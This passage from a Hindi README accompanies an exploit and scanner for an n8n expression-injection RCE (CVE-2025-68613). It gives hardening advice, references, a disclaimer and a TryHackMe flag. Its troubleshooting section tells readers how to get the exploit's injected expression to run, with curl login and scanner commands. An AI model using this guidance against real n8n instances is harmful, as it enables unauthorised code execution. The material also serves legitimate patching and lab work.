   - संवेदनशील डेटा के लिए पर्यावरण चर का उपयोग करें
   - नियमित रूप से क्रेडेंशियल घुमाएँ
   - क्रेडेंशियल एक्सेस का ऑडिट करें

5. **निगरानी और लॉगिंग**
   - व्यापक ऑडिट लॉगिंग सक्षम करें
   - असामान्य गतिविधियों की निगरानी करें
   - संदिग्ध संचालन के लिए अलर्ट सेट करें
   - नियमित लॉग समीक्षा और विश्लेषण

6. **नेटवर्क सुरक्षा**
   - n8n को पृथक नेटवर्क खंडों में चलाएँ
   - केवल आवश्यक सेवाओं तक नेटवर्क पहुँच प्रतिबंधित करें
   - दूरस्थ पहुँच के लिए VPN/फ़ायरवॉल का उपयोग करें
   - विसंगतियों के लिए नेटवर्क ट्रैफ़िक की निगरानी करें

7. **घटना प्रतिक्रिया**
   - घटना प्रतिक्रिया योजना बनाएँ
   - उन्नयन प्रक्रियाओं को परिभाषित करें
   - नियमित सुरक्षा अभ्यास आयोजित करें
   - अद्यतित संपर्क सूचियाँ बनाए रखें

---

## समस्या निवारण

### समस्या: "Exit code 1: प्रमाणीकरण या शोषण विफल"

**सामान्य कारण**:
1. **गलत क्रेडेंशियल** (सबसे सामान्य)
   - समाधान: पहले वेब UI लॉगिन के लिए क्रेडेंशियल सत्यापित करें
   - प्रयास करें: `curl -X POST http://target:5678/rest/login -d '{"emailOrLdapLoginId":"[email protected]","password":"pass"}'`

2. **उपयोगकर्ता के पास कार्यप्रवाह निर्माण अनुमतियाँ नहीं हैं**
   - समाधान: कार्यप्रवाह निर्माण अधिकार वाले व्यवस्थापक या उपयोगकर्ता खाते का उपयोग करें
   - सत्यापित करें: व्यवस्थापक पैनल → उपयोगकर्ता और अनुमतियाँ

3. **संस्करण पैच किया गया है** (संस्करण > 1.121.0)
   - समाधान: पहले स्कैनर से संस्करण जाँचें: `python3 cve-2025-68613-scanner.py -u http://target:5678`
   - अपेक्षित: स्कैनर को "Vulnerable" (एक्ज़िट कोड 2) रिपोर्ट करना चाहिए

4. **API संरचना बदल गई है** (पुराने/नए संस्करण भिन्न हो सकते हैं)
   - समाधान: NVD सलाहकार जाँचें: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
   - सबसे अधिक संभावना यदि दस्तावेज़ीकृत श्रेणी से बाहर के संस्करणों का परीक्षण कर रहे हैं

5. **नेटवर्क/फ़ायरवॉल ब्लॉक कर रहा है**
   - समाधान: कनेक्टिविटी सत्यापित करें: `curl http://target:5678/`
   - जाँचें: फ़ायरवॉल नियम, प्रॉक्सी सेटिंग्स, SSL प्रमाणपत्र

### समस्या: स्कैनर गलत सकारात्मक रिपोर्ट करता है (गलत संस्करण का पता लगाना)

**v1.02 में स्थिर**: स्कैनर अब साधारण regex के बजाय मेटा टैग से base64-डिकोडेड Sentry कॉन्फ़िगरेशन का उपयोग करता है। यह उन गलत सकारात्मकों को समाप्त करता है जहाँ Node.js संस्करण को n8n संस्करण के रूप में पता लगाया जा रहा था।

**क्या बदला**:
- प्राथमिक स्रोत: `<meta name="n8n:config:sentry" content="[BASE64]">` निकालें और डीकोड करें
- फ़ॉलबैक: केवल Sentry कॉन्फ़िगरेशन उपलब्ध न होने पर regex का उपयोग करें
- परिणाम: बिना किसी गलत सकारात्मक के सटीक संस्करण पहचान

**v1.02 स्कैनर का उपयोग करने के लिए**:```bash
# Update to v1.02
git pull origin main

# Run scanner
python3 cve-2025-68613-scanner.py -u http://target:5678

समस्या: REST निष्पादन 500 त्रुटि लौटाता है

यह एक्सप्लॉइट में बग नहीं है - यह एक API सीमा है।

स्पष्टीकरण:

  • N8n v1.121.0 में /rest/workflows/{id}/run एंडपॉइंट HTTP 500 लौटाता है
  • यह एक n8n API डिज़ाइन सीमा है, एक्सप्लॉइट बग नहीं
  • एक्सप्रेशन इंजेक्शन UI के माध्यम से अभी भी काम करता है

समाधान (Workaround):

  1. एक्सप्लॉइट दुर्भावनापूर्ण एक्सप्रेशन के साथ वर्कफ़्लो बनाता है ✅ काम करता है
  2. एक्सप्रेशन मूल्यांकन करता है और कोड निष्पादित करता है ✅ काम करता है (मैन्युअल परीक्षण से सिद्ध)
  3. UI में 'Test Step' बटन पर मैन्युअल रूप से क्लिक करें ताकि एक्सप्रेशन ट्रिगर हो ✅ काम करता है
  4. वर्कफ़्लो परिणामों से आउटपुट पढ़ें ✅ काम करता है

साक्ष्य: TryHackMe पर फ्लैग कैप्चर किया: THM{n8n_exposed_workflow}


संसाधन और संदर्भ

आधिकारिक स्रोत

  • n8n GitHub रिपॉजिटरी: https://github.com/n8n-io/n8n
  • n8n सुरक्षा परामर्श: https://github.com/n8n-io/n8n/security/advisories
  • n8n दस्तावेज़ीकरण: https://docs.n8n.io/

CVE जानकारी

  • NVD प्रविष्टि: https://nvd.nist.gov/vuln/detail/CVE-2025-68613
  • CVEDetails: https://www.cvedetails.com/cve/CVE-2025-68613/
  • CVETodo: https://cvetodo.com/cve/CVE-2025-68613

सुरक्षा संसाधन

  • NIST CWE-913: https://cwe.mitre.org/data/definitions/913.html
  • OWASP कोड इंजेक्शन: https://owasp.org/www-community/attacks/Code_Injection
  • OWASP सैंडबॉक्स बायपास: https://owasp.org/www-community/attacks/Sandbox_Escape

सारांश

CVE-2025-68613 एक गंभीर कमजोरी है जिसके लिए तत्काल कार्रवाई की आवश्यकता है। इसका संयोजन:

  • एक्सप्रेशन इंजेक्शन क्षमता
  • सैंडबॉक्सिंग की कमी
  • कम विशेषाधिकार आवश्यकताएँ
  • व्यापक आक्रमण सतह (कई उपयोगकर्ता वर्कफ़्लो बनाते हैं)
  • आईटी बुनियादी ढांचे में केंद्रीय स्थान

...यह इसे वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म में सबसे खतरनाक कमजोरियों में से एक बनाता है।

सरल समाधान: तुरंत एक पैच किए गए संस्करण में अपग्रेड करें। जब पैच उपलब्ध हों तो एक गंभीर RCE के प्रति कमजोर बने रहने का कोई बहाना नहीं है।


दस्तावेज़ संस्करण

|- संस्करण: 1.02 |- निर्माण तिथि: दिसंबर 18, 2025 |- अंतिम अद्यतन: दिसंबर 26, 2025

  • स्थिति: पूर्ण
  • लेखक: The StingR / TechSquad Inc.
  • संगठन: TechSquad Inc.

अस्वीकरण

यह दस्तावेज़ केवल शैक्षिक और अधिकृत सुरक्षा मूल्यांकन उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है। हमेशा सुनिश्चित करें कि आपके पास उन सिस्टमों का परीक्षण, मूल्यांकन या एक्सेस करने से पहले उचित प्राधिकरण है जिनके आप मालिक नहीं हैं।


⚠️ याद रखें: यदि कमजोर संस्करण चला रहे हैं तो अपने n8n इंस्टेंस को तुरंत अपडेट करें।

टूल डाउनलोड करें